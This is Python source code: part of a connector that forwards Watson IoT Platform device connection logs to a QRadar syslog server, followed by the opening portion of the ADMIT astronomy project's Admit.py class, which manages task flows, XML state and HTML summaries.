applogger.info("Exit program on SIGINT")
sys.exit(0)
#
# Get local IP address
def getLocalIP():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
s.connect(('8.8.8.8', 1))
IP = s.getsockname()[0]
except:
IP = '127.0.0.1'
finally:
s.close()
return IP
#
# Function to process device log messages and generate syslog events
#
def processLogEvent(clientId, log):
global test_mode
global systemIP
    # This function parses a log event and generates a syslog event.
# Log event from WIoTP is in JSON format. Example of a typical log event:
# {"timestamp": "2018-02-28T20:02:50.585Z", "message": "Token auth succeeded: ClientID='d:li0f0v:NXPDev:testSub', ClientIP=32.97.110.54"}
    # SYSLOG Event format (as emitted below):
    # <timestamp> <localip> <APPNAME> source=<ClientIP> event=<event> clientID=<clientId> Message=<raw log message>
timestamp = log["timestamp"]
msg = log["message"]
if test_mode == 1:
cT = time.gmtime()
tstamp = time.strftime("%b %d %H:%M:%S", cT)
syslog_header = "%s %s " % (tstamp, systemIP)
else:
syslog_header = "%s %s " % (timestamp, systemIP)
headMsg = syslog_header + APPNAMECONNECTION
# Parse authentication messages
mObj = authREObj.match(msg)
if mObj:
message = mObj.group(1)
clientId = mObj.group(2)
IP = mObj.group(3)
event = "AuthSucceeded"
if "failed" in message:
event = "AuthFailed"
eventMsg = "%s source=%s event=%s clientID=%s Message=%s" % (headMsg, IP, event, clientId, message)
applogger.debug(eventMsg)
sysLogger.info(eventMsg)
return
# Parse connection closed messages
mObj = connREObj.match(msg)
if mObj:
message = mObj.group(2)
IP = mObj.group(1)
event = "ClosedNormal"
if "by the client" in message:
state = "ClosedByClient"
if "not authorized" in message:
event = "OperationUnauthorized"
eventMsg = "%s source=%s event=%s clientID=%s Message=%s" % (headMsg, IP, event, clientId, message)
applogger.debug(eventMsg)
sysLogger.info(eventMsg)
return
# Process generic log
# check if ClientIP is specified in message
event = "NA"
IP = "NA"
mObj = genrREObj.match(msg)
if mObj:
IP = mObj.group(2)
eventMsg = "%s source=%s event=%s clientID=%s Message=%s" % (headMsg, IP, event, clientId, msg)
applogger.debug(eventMsg)
sysLogger.info(eventMsg)
#
# Get all device data from Watson IoT Platform
#
def getDevices(client, device_limit, log_limit):
# applogger.info("Start a new pool cycle ...")
_getPageOfDevices(client, device_limit, log_limit, None )
#
# Get device data in chunks
#
def _getPageOfDevices(client, device_limit, log_limit, bookmark):
global lastISOTime
global curISOTime
deviceList = client.api.getDevices(parameters = {"_limit": device_limit, "_bookmark": bookmark, "_sort": "typeId,deviceId"})
resultArray = deviceList['results']
applogger.info("Process connection logs of " + str(len(resultArray)) + " devices")
for device in resultArray:
if "metadata" not in device:
device["metadata"] = {}
typeId = device["typeId"]
deviceId = device["deviceId"]
clientId = device["clientId"]
# applogger.debug("ClientID=" + clientId)
try:
# get logs for the device
if log_limit == 0:
applogger.debug("clientID:" + clientId + " from:" + lastISOTime + " to:" + curISOTime);
logresults = client.api.getConnectionLogs({"typeId":typeId, "deviceId":deviceId, "fromTime": lastISOTime, "toTime": curISOTime})
else:
if log_limit == -1:
logresults = client.api.getConnectionLogs({"typeId":typeId, "deviceId":deviceId})
else:
logresults = client.api.getConnectionLogs({"typeId":typeId, "deviceId":deviceId, "_limit": log_limit})
logMsgCount = 0
for log in logresults:
processLogEvent(clientId, log)
applogger.debug(clientId + " LOGMSG=" + json.dumps(log))
logMsgCount += 1
if logMsgCount > 0:
applogger.info("ClientID:" + clientId + " Total events:" + str(logMsgCount))
except Exception as e:
applogger.error(str(e))
# Next page
if "bookmark" in deviceList:
bookmark = deviceList["bookmark"]
_getPageOfDevices(client, device_limit, log_limit, bookmark)
#
# Get device data and log events
#
def getEventFromAPI(client, device_limit, log_limit):
try:
getDevices(client, device_limit, log_limit)
except ibmiotf.APIException as e:
applogger.error(e.httpCode)
applogger.error(str(e))
return
except Exception as e:
applogger.info(str(e))
return
#
# Get events from log file
# Log file should be in the following format:
# <ClientID> LOGMSG=<logMessage>
#
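# For example (hypothetical client ID; the log message is the JSON object returned
# by the WIoTP connection-logs API):
#   d:orgid:MyType:dev01 LOGMSG={"timestamp": "2018-02-28T20:02:50.585Z", "message": "Token auth succeeded: ClientID='d:orgid:MyType:dev01', ClientIP=192.0.2.10"}
#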
def getEventsFromLogFile(logf):
# read log file and process log event
with open(logf, "r") as f:
for line in f:
applogger.debug(line)
lObj = logfREObj.match(line)
if lObj:
clientId = lObj.group(1)
log = lObj.group(2)
jslog = json.loads(log)
processLogEvent(clientId, jslog)
#
# Polling function to periodically invoke the REST API to get device logs and data from WIoTP
#
def getDataAndProcess():
global test_mode
global fetchInit
global configData
global startLoop
global stopLoop
global threadStopped
global lastISOTime
global curISOTime
cycle = 0
loop = 0
test_mode = configData['test_mode']
nloop = int(configData['cycles'])
device_limit = int(configData['device_fetch_limit'])
log_limit = int(configData['log_fetch_limit'])
interval = int(configData['log_fetch_interval'])
test_log = configData['test_log']
# Set current time in ISO8601 - needed for log fetch API
curTime = time.gmtime()
curISOTime = time.strftime("%Y-%m-%dT%H:%M:%S", curTime)
applogger.info("Current time: " + curISOTime + "\n")
# Get API client
config = "application.cfg"
client = None
options = ibmiotf.application.ParseConfigFile(config)
try:
client = ibmiotf.application.Client(options)
client.logger.setLevel(logging.INFO)
except Exception as e:
applogger.error(str(e))
return
while True:
if startLoop == 1:
loop += 1
# set current time
curTime = time.gmtime()
curISOTime = time.strftime("%Y-%m-%dT%H:%M:%S", curTime)
if nloop == 0:
applogger.info("WIoTP Log Fetch cycle [{0}]: Time From:{1} To:{2}".format(str(loop),lastISOTime, curISOTime))
else:
applogger.info("WIoTP Log Fetch cycle [{0}] of [{1}]: Time From:{2} To:{3}".format(str(loop),str(nloop),lastISOTime, curISOTime))
if len(test_log) > 0 and test_mode == 1:
# Get log from log file
getEventsFromLogFile(test_log)
else:
if fetchInit == 0 and log_limit == 0:
# get all old logs when connecting for the first time
getEventFromAPI(client,device_limit,-1)
fetchInit = 1
else:
getEventFromAPI(client,device_limit,log_limit)
# set last time
lastISOTime = curISOTime
# check for test cycle
if nloop > 0 and loop == nloop:
break
time.sleep(int(interval))
if stopLoop == 1:
break
applogger.info("STOP and EXIT application \n")
threadStopped = 1
sys.exit(0)
#
# Set startLoop variable so that thread can start processing data
#
def start_thread():
global startLoop
global stopLoop
print("Starting Application")
stopLoop = 0
startLoop = 1
#
# Set stopLoop / clear startLoop so that the thread stops processing data
#
def stop_thread():
global startLoop
global stopLoop
print("Stopping Application")
stopLoop = 1
startLoop = 0
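#
# For reference, a minimal application.cfg sketch covering the options read in
# get_wiotp_data() below (section and option names come from the config.get()
# calls; values are illustrative placeholders, and the WIoTP application
# credentials section expected by ibmiotf.application.ParseConfigFile() is omitted):
#
#   [qradar-syslog-server]
#   hostip = 127.0.0.1
#   port = 514
#
#   [qradar-connector]
#   replay-log-file = 0
#   log-file-name =
#   cycles = 0
#   device-fetch-limit = 100
#   log-fetch-limit = 0
#   log-fetch-interval = 60
#   level = INFO
#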
# Configure syslog server and spawn thread to get connection logs from WIoTP and generate
# syslog events
def get_wiotp_data():
global sysLogger
global systemIP
global configData
# Set up signal handler
signal.signal(signal.SIGINT, signalHandler)
applogger.info("Start qradar-connector")
# Read configuration file to read qradar syslog server host IP and Port
cwd = os.getcwd()
configpath = cwd + "/application.cfg"
# Get configuration data
config = ConfigParser.ConfigParser()
config.read(configpath)
# SYSLOG server address and port
syslog_server_address = config.get("qradar-syslog-server", "hostip")
syslog_server_port = config.getint("qradar-syslog-server", "port")
applogger.info("syslog_server_address: " + syslog_server_address )
applogger.info("syslog_server_port: " + str(syslog_server_port) )
# read parameters used for invoking WIoTP API calls and processing data
configData = {}
# Check for test mode
    configData['test_mode'] = config.getint("qradar-connector", "replay-log-file")
configData['test_log'] = config.get("qradar-connector", "log-file-name")
# Set number of cycles - default is 0 (loop for ever)
configData['cycles'] = config.getint("qradar-connector", "cycles")
# Chunk limit for getting device data
configData['device_fetch_limit'] = config.getint("qradar-connector", "device-fetch-limit")
# Log fetch strategy
    # 0 (use time period), >0 (use limit), -1 (get all)
configData['log_fetch_limit'] = config.getint("qradar-connector", "log-fetch-limit")
    # Log fetch polling interval in seconds
configData['log_fetch_interval'] = config.getint("qradar-connector", "log-fetch-interval")
# Log Level - default INFO
configData['level'] = config.get("qradar-connector", "level")
systemIP = getLocalIP()
# Set log level
applogger.removeHandler(conlogger)
conlogger.setLevel(configData['level'])
applogger.addHandler(conlogger)
applogger.debug("Configuration Data:")
applogger.debug(json.dumps(configData, indent=4))
# Set Syslog handler
sysLogger.setLevel(logging.INFO)
syslog_handler = logging.handlers.SysLogHandler( address=(syslog_server_address, syslog_server_port), facility=logging.handlers.SysLogHandler.LOG_LOCAL1)
sysLogger.addHandler(syslog_handler)
# Start thread to process data
thread = Thread(target = getDataAndProcess)
thread.start()
if __name__ == '__main__':
startLoop = 1
get_wiotp_data()
|
Admit.py
|
"""**Project** --- ADMIT project.
------------------------------
This module defines the Admit project class.
"""
# system imports
import time
import xml.etree.cElementTree as et
import fnmatch, os, os.path
import zipfile
import copy
import numpy as np
import threading
import sys
import errno
import datetime
import webbrowser
import ast
import textwrap
import traceback
import subprocess
#import Queue
#from multiprocessing.dummy import Pool as ThreadPool
import signal
# ADMIT imports
import admit
import admit.version
import admit.xmlio.Parser as Parser
import admit.Summary as Summary
import admit.util.utils as utils
import admit.util.AdmitHTTP
import admit.util.PlotControl as PlotControl
from admit.xmlio.DtdReader import DtdReader
import admit.util.bdp_types as bt
from admit.util.AdmitLogging import AdmitLogging as logging
from admit.util import LineData
# ==============================================================================
class Admit(object):
"""
Container for an ADMIT project. The project is normally based on one
single FITS cube (in some cases two, where the ingest stage needs a
primary beam to correct the science cube with), although this is not
a restriction to ADMIT.
A FITS cube results in an ADMIT directory, within which you will
    find an admit.xml file describing the project, its data products (BDP's)
and the AT's (tasks) that generated the BDP's.
If input file/directory are given or admit.xml is located in the current
directory then they are loaded into the class, else a new (empty) class is
instantiated.
Parameters
----------
baseDir : str
Base directory for XML files (the "ADMIT directory").
name : str
Alias name.
basefile : str
Base XML file name (default: admit.xml).
create : bool
Whether to create any needed directories.
dataserver : bool
Whether to start the data browser server.
loglevel : int
The integer log level from the Python *logging* module. One of:
- logging.CRITICAL = 50
- logging.ERROR = 40
- logging.WARNING = 30
- logging.INFO = 20
- logging.DEBUG = 10
Default is logging.INFO.
commit : bool, optional
Whether to commit XML-backed flows immediately; default is ``True``.
Set to ``True`` if the flow will *not* be reconstructed (as in a recipe
script) before use; this is usually the case for interactive mode. Set
to ``False`` in (most) scripts, which reconstruct the flow each time.
Attributes
----------
baseDir : str
Base directory for XML files (the "ADMIT directory").
Guaranteed to end in os.sep.
baseFile : str
Base XML file name, usually admit.xml.
currDir : str
Current working directory (at construction).
fm : FlowManager
Project flow manager instance.
new : bool
Whether the project is new or constructed from an existing XML file.
pm : ProjectManager
Project manager instance.
pmode : int
Plotting mode.
ptype : int
Plotting type.
count : int
Flow counter how many times the flow has been run (stored in userData)
project_id : int
Static project identification number
summaryData : instance of admit.Summary
AT summary data
userData : dict
Additional, user-defined data.
_data_browser_port : int
Port number that the localhost http server for the data
browser (aka data GUI) will use. This attribute is set
by the operating system.
_data_server : bool
Whether to start the data browser server.
_server : HTTP server
Data HTTP server.
Notes
-----
.. todo::
1. in the current implementation every directory, admit or not-admit, can
be made an admit directory (i.e. contain a root admit.xml)
2. we really don't need a basefile= in the argument list
"""
project_id = 0 # Class static project ID counter.
    loginit = False     # whether or not the logger has been initialized
def __init__(self, baseDir=None, name='none', basefile=None, create=True, dataserver=False,
loglevel=logging.INFO, commit=True):
#
# IMPORTANT note for dtd's: if you add items for admit.xml here,
# don't forget to edit dtdGenerator.py and run bin/dtdGenerator
#
# baseDir : should be a directory, always needed
# name : some ID, deprecate?
# basefile : should be admit.xml, why change it?
# create : create any new directory that's needed
# global ID
# [KPR] This doesn't actually work as the ID is "global" only to
# individual scripts. The ProjectManager overrides it.
# @todo can we remove this?
self.project_id = Admit.project_id
Admit.project_id = Admit.project_id + 1
# Project manager instance.
self.pm = admit.Manager()
# Timing info
self.dt = utils.Dtime("ADMITrun")
# default to zero to let OS pick an open port
self._data_browser_port = 0
# start the server for the data browser or not
self._data_server = dataserver
# old admit2 things to keep it working
self.name = name
self.plotparams()
self.loglevel = loglevel
# new Admit things
self.userData = {} # user added data, anything can go in here; use get/set
self.summaryData = Summary.Summary() # summary added data, the my_AT.summary() will provide these
self._fm0 = None # flow manager as read from XML
self.fm = admit.Flow() # flow manager
self.pm = admit.Manager() # project manager
self.new = False # is this a new admit object or are we building it from an xml
self.astale = 0 # export hack (will be True if lightweight tar file is built)
self.count = 0 # keep track how many times this admit has been run
self._server = None # data HTTP server
# location information
self.baseDir = None # base directory for xml files ('the admit directory')
self.baseFile = None # base file name, usually admit.xml
self.currDir = os.getcwd() # remember where we started (deprecate, we don't need it now)
#self.queue = Queue.Queue()
#self.pool = ThreadPool(1)
if baseDir != None:
if baseDir[0] == os.sep:
baseDir = os.path.abspath(baseDir)
#print "Absolute ADMIT"
else:
baseDir = os.path.abspath(self.currDir + os.sep + baseDir)
#print "Relative ADMIT"
else:
baseDir = os.path.abspath(self.currDir + os.sep)
#print "Local ADMIT"
#print "ADMIT(%s): CWD=%s" % (baseDir, self.currDir)
print "ADMIT basedir = %s" % (baseDir)
print "ADMIT root = %s" % (utils.admit_root())
print "ADMIT version = %s" % (self.version())
self._loggername = baseDir.replace("/", ".")
if self._loggername.startswith("."):
self._loggername = self._loggername[1:]
# look for admit.xml or admit.zip files
if os.path.exists(baseDir): # does basedir even exist yet
if os.path.isfile(baseDir): # basedir is actually a file (should we allow this?)
loc = baseDir.rfind(os.sep)
# separate out the base directory and the base file
if loc == -1:
self.baseDir = ""
self.baseFile = baseDir
else:
                    self.baseDir = baseDir[:loc+1]
self.baseFile = baseDir[loc+1:]
elif os.path.isdir(baseDir): # basedir is a directory
if baseDir[-1] == os.sep:
self.baseDir = baseDir
else:
self.baseDir = baseDir + os.sep
self.baseFile = "admit.xml" if basefile == None else basefile
self.new = not os.path.exists(self.baseDir + self.baseFile)
else:
raise Exception("basedir %s not a file or directory? " % baseDir)
if zipfile.is_zipfile(self.baseDir + self.baseFile): # detect if the file is a zip file
with zipfile.ZipFile(self.baseDir + self.baseFile, 'r') as z:
                    z.extractall(self.baseDir)
                if not os.path.exists(self.baseDir + "admit.xml"):
                    raise Exception("No admit.xml file located in %s" % self.baseDir)
self.baseFile = "admit.xml"
else: # we are working with a new basedir
#create = False
if create:
self.mkdir(baseDir)
self.new = True
if baseDir[-1] == os.sep:
self.baseDir = baseDir
else:
self.baseDir = baseDir + os.sep
self.baseFile = "admit.xml"
logging.init(self._loggername, baseDir + os.sep + "admit.log", self.loglevel)
if not Admit.loginit:
# @todo should this be in logging? for now, do here
logging.addLevelName(logging.TIMING, "TIMING")
logging.addLevelName(logging.REGRESSION, "REGRESSION")
Admit.loginit = True
if not self.new: # load the existing files/data
# @todo the AT's need the self.baseDir
# until then checkfiles() will complain the BDP.getfiles() don't exist on a re-run
# notice admit is passed to the Parser
parser = Parser.Parser(self, self.baseDir, self.baseFile)
parser.parse()
self._fm0 = parser.getflowmanager()
self._fm0._summaryData = parser.getSummary()
self._fm0._twins = {} # dict of merged tasks
# Re-initialize project manager.
for pid in parser.projmanager:
# Managed projects must be fully formed and up to date.
parser.projmanager[pid].mergeFlow()
self.pm.addProject(parser.projmanager[pid])
# Replace linked ATs in multiflows with their master copies.
# Only the latter contain validated BDP data.
for tid in self._fm0:
at = self._fm0[tid]
pid = at.getProject()
if pid:
# This task is linked from another project.
if pid in self.pm:
tid0 = at.id(True)
if tid0 in self.pm[pid].fm:
# Copy master AT reference.
self._fm0[tid] = self.pm[pid].fm[at.id(True)]
else:
raise Exception('No task #%d in project #%d' % (tid0, pid))
else:
raise Exception('No linked project #%d' % pid)
if commit: self.mergeFlow()
#print "ADMIT.baseDir = ", self.baseDir
if self.baseDir[-1:] != os.sep:
raise Exception('ADMIT.basedir=%s does not end with %s' % (self.baseDir, os.sep))
        # data server for localhost web browsing
if self._data_server:
self.startDataServer()
else:
self._data_url = None
signal.signal(signal.SIGUSR1, self._signal_handler)
self._pid = os.getpid()
if self.userData.has_key('flowcount'):
self.count = self.userData['flowcount'] + 1
else:
self.count = 1
self.userData['flowcount'] = self.count
print "ADMIT flowcount = %d stale = %d" % (self.count,self.astale)
def __str__(self):
print bt.format.BOLD + bt.color.GREEN + "ADMIT :" + bt.format.END
print self.fm
return ""
def __del__(self):
logging.shutdown()
def __len__(self):
""" Returns the numbers of tasks in the project.
"""
return len(self.fm)
def __contains__(self, tid):
"""Flow tasks membership operator.
Parameters
----------
tid : int
Task ID number or alias name.
Returns
-------
bool
Membership result.
"""
return self.fm.__contains__(tid)
def __iter__(self):
"""Flow tasks iterator.
Returns
-------
iterator
Task iterator.
"""
return iter(self.fm)
def __getitem__(self, tid):
"""
Returns an AT, referred by its task ID (an integer >= 0).
Parameters
----------
tid : int
Task ID number or alias name.
Returns
-------
AT
Reference to AT with ID `tid`.
Notes
-----
A BDP (bdp_out) can be accessed by indexing the task, i.e.,
admit[task_id][bdp_out_id] returns a BDP.
"""
return self.fm[tid]
def version(self):
"""return version of ADMIT
"""
return admit.version.__version__
def setlogginglevel(self, level):
""" Method to set the logging level
Parameters
----------
level : int
The logging level to use
Returns
-------
None
"""
logging.setLevel(level)
def getlogginglevel(self):
""" Method to return the current logging level
Parameters
----------
None
Returns
-------
An int representing the current logging level
"""
return logging.getEffectiveLevel()
def mkdir(self, dirname):
"""Make a directory in the ADMIT hierarchy, if it doesn't exist yet.
It also allows an absolute path, in the classical unix sense, but
this is normally not needed.
Parameters
----------
dirname : str
Directory name.
Returns
-------
None
"""
if dirname[0] == os.sep:
# it's already an absolute path
dname = dirname
else:
# make it relative to the admit
dname = os.path.abspath(self.baseDir + dirname)
if not os.path.exists(dname):
try:
os.makedirs(dname)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(dname):
pass
else: raise
#print "ADMIT.mkdir: ",dname
def getFlow(self):
"""
Returns flow manager instance.
Parameters
----------
None
Returns
-------
FlowManager
Flow manager instance.
"""
return self.fm
def getManager(self):
"""
Returns project manager instance.
Parameters
----------
None
Returns
-------
ProjectManager
Project manager instance.
"""
return self.pm
def plotparams(self, plotmode=PlotControl.BATCH, plottype=PlotControl.PNG):
""" Determines if plots are saved and in what format.
These are based on simple matplotlib diagrams.
Common output formats are png and pdf.
Note: this only applies to new AT's started in a flow,
to change existing parameters in a re-run for example,
you will need to manually change the AT._plot_mode
and AT._plot_type
Parameters
----------
plotmode : int
Plotting mode. Default: PlotControl.BATCH
plottype : int
Plot format type. Default: PlotControl.PNG.
Returns
-------
None
See Also
--------
util.PlotControl plot modes and types.
"""
#if plotmode < 0:
# return (self.pmode,self.ptype)
self.pmode = plotmode
self.ptype = plottype
#AT._plot_mode = plotmode
#AT._plot_type = plottype
# nasty cheat, need to formalize a safer method to talk to APlot
# @todo this also means the XML reader will not properly pass this on
#aplot.APlot.pmode = plotmode
# aplot.APlot.ptype = plottype
#print "plotmode: pmode=%d ptype=%s" % (self.pmode,self.ptype)
def addtask(self, a, stuples=None, dtuples=None):
"""
Add an AT to the project.
Also adjusts the connection mapping between tasks.
Usually all but the first task---typically, Ingest_AT---will have
'stuples' (a List of Source Tuples (task-id,bdp-id)). A source 2-tuple
consists of a task ID (``task-id``, such as returned by this method) and
BDP output slot number (``bdp-id``, zero-based). If the output slot is
zero (the tuple refers to the *first* BDP output from the task), then
the tuple can be replaced by the task ID for convenience---e.g.,
stuples = [(t1,0), (t2,1)] is equivalent to
stuples = [t1, (t2,1)].
Support for re-running scripts: this method will ignore attempts to
re-add a task of the same type and ID to the existing flow, if the
project has been restored from XML. Between invocations, scripts may be
edited to append new tasks to the flow, but not remove or insert them.
Keywords for existing ATs may also be changed by the script; if changes
are found, the existing task will be marked out-of-date.
Parameters
----------
a : AT
ADMIT task to append/insert into the flow.
stuples : list of 2-tuples, optional
List of source connection 2-tuples, one per BDP input port.
dtuples : list of 4-tuples, optional
List of destination connection 4-tuples.
Returns
-------
int
Input task ID on success, else -1 (error detected).
See Also
--------
add (FlowManager)
"""
# need to check if fm has been installed
# a.check() - was deprecated
# task should inherit these from ADMIT
# @todo some (pmode) could be changed without hard
# others (baseDir) probably not a good idea unless you cd around
a._plot_mode = self.pmode
a._plot_type = self.ptype
a.setloggername(self._loggername)
if not a.getProject():
# Reset base directory for local tasks only.
a.baseDir(self.baseDir)
else:
# Increment link count for tasks from other projects.
a.link()
if stuples != None:
raise Exception("addtask: cannot specify stuples for linked task")
# now add the BDP_in's to the AT
# note the BDP_out's are generated later, and cannot be added via fm.add() at this stage
#
return self.fm.add(a, stuples, dtuples)
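    # Example flow construction (illustrative; Ingest_AT is the usual first task,
    # the second task and its keyword are hypothetical placeholders):
    #   t0 = p.addtask(admit.Ingest_AT(file='cube.fits'))
    #   t1 = p.addtask(admit.Some_AT(key=value), stuples=[t0])   # consumes t0's first BDP output
    #   p.run()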
def findtask(self, isMatch):
"""
Finds ATs in the flow matching a criterion.
Applies the function `isMatch` to all ATs in the flow, in proper
dependency order, accumulating matching ATs in a list (the return
value). Downstream ATs are guaranteed to follow their predecessors in
this list. Often `isMatch` may be conveniently expressed as a lambda
function.
Parameters
----------
isMatch : bool functor(AT)
Function object taking one AT as input and returning a Boolean.
Returns
-------
list of ATs
ATs testing True using `isMatch`.
Notes
-----
This method is a wrapper for `FlowManager.find()
<FlowManager.html#admit.FlowManager.FlowManager.find>`_.
Examples
--------
To find all ATs with ID less than 100 in project `p`:
>>> p.find(lambda at: at.id() < 100)
"""
return self.fm.find(isMatch)
def dir(self):
"""See AT.dir() but placed here for convenience as well.
Parameters
----------
None
Returns
-------
str
Base directory.
"""
return self.baseDir
def exit(self, exit):
""" Early cleanup and exit if exit > 0
Parameters
----------
exit : int
The exit code to exit with (must be > 0)
Returns
-------
None
"""
if exit > 0:
self.run()
logging.error("exit %d" % exit)
os._exit(exit) # quick exit, return status 'exit'
#sys.exit(exit) # exit back to CASA, which then becomes confused and return status 0
else:
logging.info("exit %d" % exit)
os._exit(0)
def mergeFlow(self, finalize = True):
"""
Merges tasks from the XML-derived flow (if any).
When projects are restored to memory from persistent XML files, that
task flow is initially held in stasis while the (possibly modified)
flow is being reconstructed, typically by re-running a script. This
reconstruction phase lasts from the point where the XML is read up to
the first call to this method with `finalize` set (most typically, the
first call to run(), which calls this method internally). Calling this
method during reconstruction compares the old flow to the newly
constructed flow and tasks present unaltered in the new flow (i.e.,
same BDP inputs and keyword values as before) are marked up to date, if
they were up to date in the original flow. Other relevant attributes
are transferred as appropriate.
Parameters
----------
finalize : bool, optional
Whether to discard the XML-derived flow after merge analysis,
preventing future merge attempts.
Returns
-------
None
Notes
-----
It is permissible to add or remove arbitrary tasks from the flow, in an
arbitrary order, while reconstructing it. Tasks unaffected by the
changes (if any) will not be re-executed gratuitously.
After finalization, the old flow is forgotten and subsequent calls will
have no effect (and likewise for fresh projects not backed by XML).
"""
if self._fm0:
# print "-- fm0 -- "
# self._fm0.show()
# print "-- fm (pre) -- "
# self.fm.show()
if self.fm:
# A non-empty flow has been constructed.
self.fm.mergeTasks(self.summaryData,
self._fm0,
self._fm0._summaryData,
self._fm0._twins, finalize)
else:
# No new flow; just restore the old one as-is.
self.summaryData = self._fm0._summaryData
del self._fm0._summaryData
del self._fm0._twins
self.fm = self._fm0
self._fm0 = None
# Ensure new task IDs don't overwrite existing ones!
if self.fm: self.fm._taskid = 1 + max(self.fm._bdpmap.keys())
if finalize:
if self._fm0:
# Remove orphaned BDPs attached to any remaining unmatched tasks.
# These tasks are gone from the flow.
for tid0 in self._fm0:
if not self._fm0._twins.has_key(tid0):
task = self._fm0[tid0]
logging.warning("Task %s - '%s' no longer in flow; deleting "
"associated BDP data:" %
(task._type, task._alias))
for bdp in self._fm0[tid0]:
if bdp is not None:
logging.warning(" BDP Name: %s Type: %s Uid: %d" %
(bdp.show(), bdp._type, bdp._uid))
bdp.delete()
self._fm0 = None
# print "-- fm (post) -- "
# self.fm.show()
# def __run__(self, write=True):
# print "******************DOING RUN IN THREADPOOL*************************"
# writeargs = [write]
# self.pool.map(self.__run__,writeargs)
# print "******************DONE RUN IN THREADPOOL*************************"
def _signal_handler(self,num,stack):
print 'Received signal %d in %s' % (num, threading.currentThread())
sys.stdout.flush()
sys.stderr.flush()
self.run()
def dryrun(self):
self.fm.dryrun()
def run(self, write=True, commit=True):
"""
Runs the project flow.
Run those pieces of the pipeline flow
deemed out of date. After the run, the flow
tasks gather their summary into ADMIT's summaryData,
ensuring that summaryData always is consistent with the
current flow, and does not contain remnants from orphans.
Parameters
----------
write : bool, optional
Whether to write the project XML files after running the flow;
default is ``True``.
commit: bool, optional
Whether to commit the current flow after merging flow tasks with
the XML-derived flow (if present). Set to ``False`` during incremental
run()/addtask() flow reconstruction. Once a flow is committed, all
requests to add or remove flow tasks will vest immediately. Default
is ``True``.
Returns
-------
None
See Also
--------
mergeFlow
Notes
-----
This method supports intelligent re-running of projects read from XML.
Task flows may be reconstructed (as in a script) in any order, from the
point where the XML is read up to the first call to run() (with
commit=True). Tasks present (unaltered) in the new flow and marked up
to date in the XML will not be re-executed.
"""
# For multiflows, re-run parent projects first. This ensures all
# linked tasks (which could depend on each other, if linked from the
# same parent) are processed in the correct order.
logging.info("ADMIT run() called [flowcount %d]" % self.count)
for pid in self.pm:
self.pm[pid].run()
# Merge XML-backed flow, if any.
self.mergeFlow(commit)
# Make current project summary globally available to ATs.
# It will be updated on-the-fly in FlowManager.run().
admit.Project.summaryData = self.summaryData
try:
self.fm.run()
except:
logging.error("Project run() failed; %s : saving state..." % str(sys.exc_info()))
self.write()
raise
# print "-- fm (run) -- "
# self.fm.show()
self.userdata()
if write: self.write() # includes HTML update
cpu = self.dt.end()
logging.info("ADMIT run() finished [flowcount %d] [cpu %g %g ]" % (self.count,cpu[0],cpu[1]))
def print_summary(self):
"""Print out summary data
Parameters
----------
None
Returns
-------
None
"""
print "############## SUMMARY DATA ###############"
self.summaryData.show()
def userdata(self):
"""Collects current AT userdata. **warning:** No check is done for duplicate keys!
Parameters
----------
None
Returns
-------
None
"""
for tid in self.fm:
self.userData.update(self.fm[tid].userdata())
def updateHTML(self):
"""Writes out HTML views of this object.
It is expected that summary() has been called first.
Parameters
----------
None
Returns
-------
None
"""
admitresources = utils.admit_root() + os.sep + "etc" + os.sep + "resources"
d = self.dir() + "resources"
#grmph, this gets CVS directory too. need to remove separately
cmd = "rm -rf %s && cp -r %s %s" % (d, admitresources, d)
os.system(cmd)
# rm CVS
for (path,dirs,files) in os.walk(d):
if path.endswith("CVS"):
utils.remove(path)
dotfile = self.dir()+'admit.dot'
self.fm.diagram(dotfile)
# Attempt to create a PNG from the dot file.
# summary.html() will look for this. Ignore
# if 'dot' is not on system (retval nonzero)
#
# Command must be in a list because shell=True is a security hazard.
# See https://docs.python.org/2/library/subprocess.html#using-the-subprocess-module
cmd = ["dot", "-Tpng", "-o", self._dotdiagram(), dotfile]
try:
retval = subprocess.call(cmd)
if retval !=0: diagram = ""
except:
diagram = ""
self.summaryData.html(self.dir(), self.fm, self._dotdiagram())
self.atToHTML()
self.logToHTML()
def atToHTML(self):
"""Write individual AT data to the html form"""
self.fm.connectInputs() # throws exception
admitloc = utils.admit_root()
admitetc = admitloc + os.sep + "etc"
admitfile = admitetc + os.sep + "form_at.html"
admit_headfile = admitetc+os.sep+"form_head.html"
admit_tailfile = admitetc+os.sep+"form_tail.html"
# self.dir() has trailing slash, need to strip it or
# basename() returns ''
# python basename() behavior different from Unix!!
outdir = self.dir()
basedir = os.path.basename(outdir.rstrip(os.sep))
# Spit out the boiler plate header that is the same for
# all form.html files.
try:
with open(admit_headfile,"r") as h:
header = h.read() % (basedir,basedir)
outfile = outdir + "form.html"
f = open(outfile,"w")
f.write(header)
except:
return
try:
with open(admitfile,"r") as h:
header = h.read()
except:
return
xx = '\n'
for tid in self.fm:
xx = xx + self.fm[tid].html(header)
f.write(xx)
# Spit out the boiler plate tail that is the same for
# all form.html files.
try:
with open(admit_tailfile,"r") as h:
tail = h.read() % datetime.datetime.now()
f.write(tail)
except:
f.close()
return
f.close()
def logToHTML(self):
"""Write the admit.log to an html file"""
admitloc = utils.admit_root()
admitetc = admitloc + os.sep + "etc"
admitfile = admitetc + os.sep + "log_template.html"
outdir = self.dir()
basedir = os.path.basename(outdir.rstrip(os.sep))
admitlog = outdir + "admit.log"
outfile = outdir + "log.html"
try:
with open(admitfile,"r") as h:
template = h.read()
with open(admitlog,"r") as l:
logtext = l.read()
with open(outfile,"w") as f:
f.write(template % (basedir, basedir, logtext, datetime.datetime.now()) )
f.close()
except Exception, e:
print e
return
def script(self, pyfile):
"""
Generates a Python script regenerating the current project.
The resulting script is intended to recreate the project results from
scratch and to be run from the *parent* of the project directory.
Running the script over existing project results is unpredictable and
not supported.
Parameters
----------
pyfile : str
Output Python script file name.
Returns
-------
None
"""
py = open(pyfile, mode='w')
dirs = os.path.split(self.dir()[:-1])
py.write("#!/usr/bin/env casarun\n"
"#\n"
"# This script was auto-generated by ADMIT version %s"
" and may be overwritten;\n"
"# copy before editing. It expects to run from %s/.\n"
"# If you need to start from scratch: rm -rf %s\n"
"#\n" % (self.version(),dirs[0],dirs[1]))
# If we're processing only one FITS cube, let the user specify a
# different one on the command line.
tcube = []
for tid in self.fm._depsmap[0]:
if self[tid]._type == 'Ingest_AT': tcube.append(tid)
if len(tcube) == 1:
tcube = tcube[0]
py.write("# This flow processes a single data cube. "
"To process other cubes in the same\n"
"# way, call this script with another cube file "
"as the command line argument:\n"
"# %% admit0.py CUBEFILE\n"
